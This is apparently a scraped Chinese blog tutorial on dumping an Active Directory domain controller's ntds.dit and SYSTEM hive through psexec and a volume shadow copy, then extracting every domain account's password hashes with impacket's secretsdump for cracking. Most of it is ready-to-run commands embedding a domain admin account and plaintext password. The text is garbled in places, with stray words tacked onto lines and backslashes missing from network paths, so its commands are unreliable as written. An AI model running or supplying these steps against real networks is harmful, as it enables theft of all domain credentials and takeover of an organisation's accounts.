内网安全：05.dump内网DC的ntds.dit，获取hash

时间 2020-06-10

标签安全 05.dump dump ntds.dit ntds dit 获取 hash 栏目系统安全繁體版

原文原文链接

叙述：有时候咱们碰到一个内网环境，有ＤＣ的密码，因而使用这个方法，导出ＤＣ中全部内网主机的密码并破解git

0x0 环境
DC：172.31.20.30　　domain用户：pentest\administrator 密码：UFhae&pwL%F
内网主机A（win 2012）：172.31.21.166
psexec： https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
secretsdump：https://github.com/SecureAuthCorp/impacket/releases
0x1 使用psexec 导出加密后的ntds.dit
使用psexec 获取信息：
psexec /accepteula \172.31.20.30 -u pentest\administrator -p "UFhae&pwL%F" -h cmd /c "vssadmin create shadow /for=c: >> \172.31.21.166\c$\out.txt" #获取信息且输出到out.txt，成功github

使用psexec 导出加密后的ntds.dit：
psexec /accepteula \172.31.20.30 -u "pentest\administrator" -p "UFhae&pwL%F" -h cmd /c "copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit \172.31.21.166\c$\"windows

使用psexec 导出加密后的system：
psexec /accepteula \172.31.20.30 -u "pentest\administrator" -p "UFhae&pwL%F" -h cmd /c "copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \172.31.21.166\c$\" 安全

咱们有了ntds.dit和system就能够解密了dom

0x2 解密ntds.dit和system
工具是：impacket里的secretsdump
我用的kali，这个工具windows也是支持的。。。。-------&bugfor首发：菊花槿&
kali先快速安装：
pip install .
而后把ntds.dit和system放到secretsdump.py一块儿执行：
secretsdump.py -ntds ntds.dit -system SYSTEM localide

扫描后拿去解密hash便可：
工具